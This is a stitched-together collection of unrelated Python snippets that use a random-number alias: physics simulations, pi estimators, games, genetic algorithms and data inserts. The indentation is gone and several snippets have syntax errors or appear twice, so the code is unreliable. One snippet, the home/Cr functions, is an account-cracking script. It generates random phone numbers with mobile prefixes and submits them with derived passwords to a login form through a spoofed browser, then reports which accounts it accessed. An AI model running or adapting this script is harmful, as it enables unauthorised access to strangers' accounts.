def metropolis_transfer(self, beta, Box, factor):
n = int(self.N * ran())
x = self.r[n][0]
y = self.r[n][1]
drx = dr * (2 * ran() - 1)
dry = dr * (2 * ran() - 1)
x_new = x + drx
y_new = y + dry
if x_new < 0: x_new += Box.L
elif x_new > Box.L: x_new -= Box.L
if y_new < 0: y_new += Box.L
if y_new > Box.L: y_new -= Box.L
dE = Box.calculate_energy(n, x_new, y_new) - self.calculate_energy(
n, x, y)
if dE <= 0:
Box.r.append([x_new, y_new])
self.r.pop(n)
self.N = len(self.r)
elif ran() < factor * m.exp(-beta * dE):
Box.r.append([x_new, y_new])
self.r.pop(n)
self.N = len(self.r)
def getInput():
global totalDots
global insideDots
userInput = int(entryPrecision.get())
count = 0
radius = float(((size - 20) / 2))
while count <= userInput:
x, y = (ran(10, size - 10), ran(10, size - 10))
dist = ((((radius - x)**2) + ((radius - y)**2))**(1 / 2))
canvas.create_oval(x, y, x, y, width=1, outline='white')
count += 1
totalDots += 1
if dist <= radius:
insideDots.append(1)
canvas.update()
canvas.create_oval(10, 10, size - 10, size - 10, width=5, outline='black')
canvas.create_oval(10,
10,
size - 10,
size - 10,
width=3,
outline='#38d14f')
pi = 4 * (len(insideDots) / totalDots)
piDisplay = Label(text=pi)
piDisplay.pack(side=BOTTOM)
def metropolis_translation(self, beta):
n = int(self.N * ran())
x = self.r[n][0]
y = self.r[n][1]
drx = dr * (2 * ran() - 1)
dry = dr * (2 * ran() - 1)
x_new = x + drx
y_new = y + dry
if x_new < 0: x_new += self.L
elif x_new > self.L: x_new -= self.L
if y_new < 0: y_new += self.L
if y_new > self.L: y_new -= self.L
dE = self.calculate_energy(n, x_new, y_new) - self.calculate_energy(
n, x, y)
if dE <= 0:
self.r[n][0] = x_new
self.r[n][1] = y_new
elif ran() < m.exp(-beta * dE):
self.r[n][0] = x_new
self.r[n][1] = y_new
def gen_str(msh):
str = ['' for _ in range(9)]
for x in range(8, 3, -1):
digit = ran(0, x)
while str[digit] != '':
digit += 1
str[digit] = msh.pp(ran(0, len(msh) - 1))
return str
def getting_food(snake, box):
food = None
while food is None:
# random position between [Upper Y + 1 , Lower Y - 1], [Left X + 1, Right X - 1]
food = [ran(box[0][0] + 1, box[1][0] - 1), ran(box[0][1] + 1, box[1][1] - 1)]
if food in snake:
food = None
return food
def gaussianRand(mu, sigma):
""" Two independent uniformly distributed random variables xi1 and xi2 become
two independent Gaussian distributed variables Xf and Yf under Box-Müller
Transformation.
"""
xi1, xi2 = ran(), ran()
Xf, Yf = sqrt(-2 * log(xi1)) * cos(2 * pi * xi2), sqrt(
-2 * log(xi1)) * sin(2 * pi * xi2)
return (mu + sigma * Xf)
def addBomb(self, h: int, w: int, b: int):
if b > h * w:
exit(1)
for i in range(b):
hran = round(ran() * (h - 1))
wran = round(ran() * (w - 1))
while self.mine[hran][wran]:
hran = round(ran() * (h - 1))
wran = round(ran() * (w - 1))
self.mine[hran][wran] = True
def __init__(self, bottom=GROUND_Y, top=0, left=0, right=SCREEN_X):
self.color = RED
self.r = ran(20, 25)
self.right = right
self.left = left
self.top = top
self.bottom = bottom
self.x = ran(self.left + self.r, self.right - self.r)
self.y = ran(self.top + self.r, self.bottom - self.r)
self.v = self.r / 4
self.angle = ran(0, int(2 * pi * 100))
self.vx = self.v * cos(self.angle // 100)
self.vy = self.v * sin(self.angle // 100)
def home():
for x in range(300):
if s == '010':
f = str(ran(101111111, 109999999))
else:
if s == '011':
f = str(ran(111111111, 119999999))
else:
if s == '012':
f = str(ran(121111111, 129999999))
else:
if s == '015':
f = str(ran(151111111, 159999999))
else:
exit()
login = '******'
useragents = [(
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 .Firefox/45.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
)]
def Cr():
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
max_time=1)
br.addheaders = [('User-agent', random.choice(useragents))]
site = br.open(login)
br.select_form(nr=0)
br.form['email'] = '0' + f
br.form['pass'] = '******' + f
sub = br.submit()
log = sub.geturl()
print(A5thar)
print 'Loiding On The Accounts...' '0' + f
if log != login and 'login_attempt' not in log:
print(Roz)
print 'Accounts is Checking'
else:
print(A7mar)
print 'Accounts not checking'
Cr()
def A(a1,a2,a3,a,b,c,d,e):
aas=[a1,a2,a3]
oos=[a,b,c,d,e]
choiceA=[]
for elem in range(ran(2,7)):
choiceA.append([choice(aas),choice(oos)])
return(choiceA)
def RPS:
hands = ["R","P","S",
]
Win = 0
Los = 0
Tie = 0
print("q to leave")
while True:
person_rps = input("Witch one? Rock Paper or Scissors(R/P/S)")
if person_rps.upper() == "Q":
break
elif person_rps.upper() in hands:
computer_rps = str(hands[ran(1,3)-1])
print(computer_rps)
if computer_rps.upper() == person_rps.upper():
print ("Tie")
Tie += 1
elif hands[position(hands,computer_rps)-1] == person_rps.upper():
print("Los")
Los+ = 1
else:
Win += 1
else:
print("Cheaters loose")
print("Wins : %s, Losses: %s, Ties %s." % (Win Los,Tie))
def noise():
global img, way
way = input()
way = 'Загруженные фотографии/' + way
print('Оцените мощность шумов от 0 до 100')
power = int(input())
if power < 0 or power > 100:
print('Вы ввели недопустимое значение')
menu()
img = Image.open(way)
img = img.convert(mode="RGBA")
pixels = img.load()
i = 0
while i < img.width:
j = 0
while j < img.height:
r, g, b, a = pixels[i, j]
c = ran(0, round(power * 2.55))
r += c % 255
g += c % 255
b += c % 255
a += c % 255
pixels[i, j] = (r, g, b, a)
j = j + 1
i = i + 1
img.show()
def rockPaperScissors():
com = ran(0, 2)
gamerChoice = input('Pick Rock Paper or Scissors: \n')
comStr = ['Rock', 'Paper', 'Scissors']
epic = comStr[com]
if gamerChoice == epic:
print('They Chose {}!'.format(epic))
q = input('Tie \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
if gamerChoice == 'Rock':
if epic == 'Scissors':
q = input('You Win! \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
elif epic == 'Paper':
print('They Chose {}!'.format(epic))
q = input('You Lose! \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
elif gamerChoice == 'Paper':
if epic == 'Rock':
q = input('You Win! \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
elif epic == 'Scissors':
print('They Chose {}!'.format(epic))
q = input('You Lose! \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
elif gamerChoice == 'Scissors':
if epic == 'Rock':
print('They Chose {}!'.format(epic))
q = input('You Lose! \nReplay? y/n: ')
if q == 'n':
rockPaperScissors()
else:
quit
elif epic == 'Paper':
q = input('You Win! \nReplay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
else:
q = input('Invalid Choice \n Replay? y/n: ')
if q == 'y':
rockPaperScissors()
else:
quit
def encrypt(txt):
file = open('dict.py').readlines()
ls = []
for i in range(len(file)):
ls.append(file[i].strip('\n'))
txt = list(txt)
inpt = []
for i in txt:
try:
inpt.append(ls.index(i) + 1)
except Exception as e:
pass
txts = []
txtz = []
for i in range(10):
txtz.append(ls[ran(0, len(ls) - 1)])
txtv = 0
for i in range(10):
if i == 0:
txtv = ls.index(txtz[i])
else:
txtv += ls.index(txtz[i])
n = txtv
total = 0
for ii, i in enumerate(inpt):
if ii == 0:
total += i
else:
iss = i
if len(str(i)) == 1:
iss = '0' + str(iss)
total = int(str(total) + str(iss))
total *= n
total *= n
return [''.join(txtz), total]
def Attack(self):
print(self.name + " saldırıyor.")
spent_bullets = ran(0, 10)
print(str(spent_bullets) + " mermi harcandı")
self.bullet_count -= spent_bullets
return spent_bullets, self.fight_power
def RPSLSp():
hands = ["R","SP","P","L","S",]
Win = 0
Los = 0
Tie = 0
print("q to leave")
while True:
person_rps = input("Which one? Rock, Paper, Scissors, Lizard, or Spock? (R/P/S/L/SP)")
if person_rps.upper() == "Q":
break
elif person_rps.upper() in hands:
computer_rps = str(hands[ran(1,5)-1])
print computer_rps
if computer_rps.upper() == person_rps.upper():
print ("Tie")
Tie += 1
elif hands[position(hands,computer_rps)-1] == person_rps.upper() or hands[position(hands,computer_rps)-2] == person_rps.upper():
print("Lose")
Los += 1
else:
Win += 1
print("Win")
else:
print("Cheaters loose")
print("Wins : %s, Losses: %s, Ties %s." % (Win,Los,Tie))
def notgen(n, imei):
array = []
physics = list(range(0, n))
for i in physics:
check = str(ran(0, 9))
imeic = str(imei + i) + check
array.append(imeic)
return array
def Ising(S, beta, steps) :
for sweep in range(steps) :
for i in range(vol) :
k = randint(0, vol-1)
h = S[nbhr(k)[0]] + S[nbhr(k)[1]] + S[nbhr(k)[2]] + S[nbhr(k)[3]]
dE = 2*h*S[k]
boltzmann = np.exp(-beta*dE)
if ran(0., 1.) < boltzmann : S[k] = -S[k]
return S
def genSerial():
dserial = ''
now = datetime.now()
dserial += str(now.day)
dserial += str(now.year)
dserial += str(now.month)
dserial += str(now.second)
serial = int(dserial[::-1])+ran(1995,2018)
return str(serial)
def Ising(S, beta, steps):
for sweep in range(steps):
for i in range(vol):
k = randint(0, vol - 1)
h = sum(S[nbhr(k)[j]] for j in range(4))
dE = 2 * h * S[k]
boltzmann = np.exp(-beta * dE)
if ran(0., 1.) < boltzmann: S[k] = -S[k]
return S
def generaBalaEnemigo(listaEnemigos,listaBalasEnemigos, imgBala):
while len(listaEnemigos) > 1:
disparo = listaEnemigos[ran(0, len(listaEnemigos))]
spriteBala = pygame.sprite.Sprite()
spriteBala.image = imgBala
spriteBala.rect = imgBala.get_rect()
spriteBala.rect.top = disparo.rect.top + disparo.rect.height
spriteBala.rect.left = disparo.rect.left + (disparo.rect.width // 2)
listaBalasEnemigos.append(spriteBala)
def MCmove(self, beta):
''' This is to execute the Monte Carlo moves using
Metropolis algorithm such that detailed
balance condition is satisified'''
for k in range(vol) :
h = sum(config[self.nbhr(k)[j]] for j in range(4))
dE = 2*h*config[k]
boltzmann = np.exp(-beta*dE)
if ran(0., 1.) < boltzmann : config[k] = -config[k]
return config
def selecionaPai(self, somatotal):
pai = -1
valor_sorteado = ran() * somatotal
soma = 0
i = 0
while i < len(self.populacao) and soma < valor_sorteado:
soma += self.populacao[i].nota_avaliacao
pai+=1
i+=1
return pai
def DiscreteChoice(events):
''' Events is a list of the form [0,...information...,0]. So that information is the information about the weighting of each event you consider '''
ep = ran()
middle = ep*sum(events)
index = 1
for index in range(len(events)):
left = sum(events[0:index])
right = left + events[index] #sum(events[0:index+1])
if (left < middle <= right) == True:
return(index-1)
def mutacao(self, taxa_mutacao):
# print ("Antes %s" %self.cromossomo)
for i in range (len(self.cromossomo)):
if ran() < taxa_mutacao:
if self.cromossomo[i] == "1":
self.cromossomo[i] = "0"
else:
self.cromossomo[i] = "1"
# print ("Depois %s" %self.cromossomo)
return self
def remove(self): # zwraca losowy element
if self.is_empty():
raise IndexError("Z pustego i Salomon nie naleje")
else:
x = ran(self.head, self.tail - 1)
item = self.items[x]
self.items[x] = self.items[self.head]
self.items[self.head] = None
self.head = (self.head + 1) % self.n
return item
def genPin():
dpin = ''
# sp = '-'
now = datetime.now()
dpin = str(now.microsecond)
dpin += str(now.minute)
salt = ran(1995,2018)
dpin += str(now.hour+salt)
#dpin += str(in))
pin = dpin[::-1]
return pin
def volume_change_utilities(self, id):
dV = self.L2 * ran() * 0.001
V_new = self.L2 + id * dV
change = (V_new / self.L2)**(1 / 3)
temp = self.r
for r in temp:
r[0] *= change
r[1] *= change
return (self.calculate_energy(-1, 0, 0), dV, change)
def calcularPi():
canvas.delete('all')
# Variáveis
raio = tamanho/2
pontoDentro = 0
pontoTotal = 0
# Círculo
circulo = canvas.create_oval(0, 0, tamanho, tamanho, outline='#7d0101', width=2)
# Loop
inputUsuario = nPontos.get()
for i in range(int(inputUsuario)):
# Gerar coordenadas
coordx = ran(0, tamanho)
coordy = ran(0, tamanho)
# Mostrar pontos
canvas.create_oval(coordx, coordy, coordx, coordy, outline='#bdc1c9', width=2)
# Checar onde caiu
dist = ((raio - coordx)**2 + (raio - coordy)**2)**0.5
pontoTotal += 1
if dist <= raio:
pontoDentro += 1
# Calcular pi
pi = 4*pontoDentro/pontoTotal
# Exibir valor
display.config(text='{:.5f}'.format(pi))
sleep(0.01)
canvas.update()
canvas.itemconfig(circulo, outline='#75a158')
def __init__(self,X,Y,NAME,TYPE,mobile=True,direccion = "Random", limite0 = -10000, limite1 = -10000,limite2 = 10000, limite3 = 10000):
TYPE = int(TYPE)
self.mobile = mobile
self.angle = ran(0,360)
self._TYPE = TYPE
self.direccion = direccion
self.dirh = 1
self.dirv = 1
self.limites = [limite0, limite1, limite2, limite3]
if TYPE == 1:
self.type1()
elif TYPE == 2:
self.type2()
tags = ["Enemy","Wall","Mobile"]
self.element(X, Y, NAME, "Enemy", tags, self.surface)
def __init__(self, espacos, valores, limite_espacos, geracao = 0):
self.espacos = espacos
self.valores = valores
self.limite_espacos = limite_espacos
self.nota_avaliacao = 0
self.espaco_usado = 0
self.geracao = geracao
self.cromossomo = []
#Criando individuo aleatoriamente. NADA DE INTELIGENCIA, AINDA
for i in range (len(espacos)):
if ran() < 0.5:
self.cromossomo.append("0")
else:
self.cromossomo.append("1")
def main_func(self):
os.chdir("/home/jakesyl/Quotes/pyQOTD/src/")
response = urlopen('http://www.iheartquotes.com/api/v1/random')
html = response.read()
filename = str(strftime("%Y-%m-%d", gmtime()))
filename += str(ran(90))
filename += '.md'
with open(filename, mode = 'a', encoding = 'utf-8') as a_file:
a_file.write(str(html))
gitpush = sp.check_output('git add -A && git pull && git commit -m "daily file" && git push -f', stderr=sp.STDOUT, shell=True)
gitpush
commands = ["mv " + filename + ' ~/Quotes/QOTD/_posts/', 'cd ~/Quotes/QOTD/ && git add -A', 'cd ~/Quotes/QOTD/ && git commit -m "added new posts"', 'cd ~/Quotes/QOTD/ && git pull', 'cd ~/Quotes/QOTD/ && git push -f', 'cd ~/Quotes/pyQOTD/ && rm -rf ' + filename + ' && git add -A && git pull && git commit -m "added daily file" && echo hi && git push -f && echo done']
for command in commands:
gitpush = sp.check_output(command , stderr=sp.STDOUT, shell=True)
gitpush
def executeRandom(command, PATH2IMAGES, TIME2WAIT, stop): # Script execution: Random
pic = []
while True:
array = listdir(PATH2IMAGES)
if stop > len(array):
stop = len(array)
for i in range(stop):
pic.append(array.pop(ran(0, len(array) - 1)))
array = None
for i in range(stop):
# print("Pic: >>>"+pic[0]+"<<<")
system(command + PATH2IMAGES + renamePic(pic.pop(0)))
sleep(TIME2WAIT)
def crossover(self, individuo):
##Calcula o corte (de um ponto) aleatoriamente
corte = round(ran() * len(self.cromossomo))
##Cria os CROMOSSOMOS dos filhos a partir do corte criado
filho1 = individuo.cromossomo[0:corte] + self.cromossomo[corte::]
filho2 = self.cromossomo[0:corte] + individuo.cromossomo[corte::]
##cria os individuos filho
filhos = [Individuo(self.espacos, self.valores, self.limite_espacos, self.geracao + 1),
Individuo(self.espacos, self.valores, self.limite_espacos, self.geracao + 1)]
##Necessário setar o cromossomo para esses filhos
filhos[0].cromossomo = filho1
filhos[1].cromossomo = filho2
return filhos
def insertData(self):
users = list()
for x in range(0, 50, 1):
users.append((ran(1,5), ran(40, 60), ran(5,10), ran(70401, 70406), self.random_date()))
users.append((ran(1,5), ran(0, 20), ran(5,10), ran(70406, 70410), self.random_date()))
users.append((ran(1,5), ran(80, 90), ran(5,10), ran(70410, 70415), self.random_date()))
self.c.executemany('INSERT INTO "%s" (Type, Amount, Category,zipcode, datetime) VALUES(?,?,?,?, ?)'%self.tableName, users)
self.conn.commit()
return "success"
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 31 18:37:48 2016
@author: SRINIVAS
"""
import winsound
from random import randint as ran
from random import choice
winsound.Beep(6000, 100)
a=ran(200,1000)
b=ran(200,1000)
c=ran(200,1000)
d=a=ran(100,500)
e=a=ran(200,1000)
a1=ran(100,500)
a2=ran(100,3000)
a3=ran(100,3000)
b1=[]
choiceA=[]
choiceB=[]
choiceC=[]
def A(a1,a2,a3,a,b,c,d,e):
aas=[a1,a2,a3]
oos=[a,b,c,d,e]
choiceA=[]
for elem in range(ran(2,7)):
choiceA.append([choice(aas),choice(oos)])
return(choiceA)
At=A(a1,a2,a3,a,b,c,d,e)
from sklearn.datasets.samples_generator import make_blobs
tablep ="Transaction"
countQuery=' SELECT rowid, * FROM "%s"' %tablep
deleteQuery=' DELETE FROM "%s" where Amount = 0' %tablep
selectAmountQuery=' SELECT AMOUNT FROM "%s"' %tablep
conn = sql.connect('History')
print("connection successful")
c = conn.cursor()
#c.execute(countQuery)
users = list()
for x in range(0, 10, 1):
users.append((0, ran(210, 240), "", ran(70401, 70406), "", ""))
#c.executemany('INSERT INTO "%s" (Type, Amount, Category,zipcode, date,time) VALUES(?,?,?,?,?,?)'%tablep, users)
conn.commit()
def insert(type, amount, category, zipcode, date, time):
c.execute('INSERT INTO "Transaction" (Type, Amount, Category,zipcode, date,time) VALUES(?,?,?,?,?,?)', type, amount, category, zipcode, date, time)
amount=list()
for row in c.execute(countQuery):
print (row),
amount.append(float(row[0]))
X=StandardScaler().fit_transform(amount)
def Choice(cdf,x):
''' Inputs: cdf [type = list or vector], x values [type=list or vector]; Output: floating point value of choice '''
''' Returns the the chosen value (corresponding to the CDF) that are closest to the choice random value (ranging from 0 to 1)'''
choice = ran()
return interpol(choice,cdf,x,option='linear')
import matplotlib.pyplot as plt
import matplotlib.animation as animation
L = [(0.25, 0.25), (0.75, 0.25), (0.25, 0.75), (0.75, 0.75)]
sigma = 0.15
delta = 0.15
square_x = [0, 1, 1, 0, 0];
square_y = [0, 0, 1, 1, 0]
number = 0
fig = plt.figure()
ims = []
for iter in range(100):
a = choice(L)
L.remove(a)
b = (a[0] + ran(-delta, delta), a[1] + ran(-delta, delta))
min_dist = min((b[0] - x[0]) ** 2 + (b[1] - x[1]) ** 2 for x in L)
box_cond = min(b[0], b[1]) < sigma or max(b[0], b[1]) > 1 - sigma
if box_cond or min_dist < 4 * sigma ** 2:
L.append(a)
else:
L.append(b)
if iter % 1 == 0:
number += 1
plt.axes()
for x, y in L:
cir = plt.Circle((x, y), radius=sigma, fc='r')
plt.gca().add_patch(cir)
plt.axis('equal')
ims.append((plt.plot(square_x, square_y),))
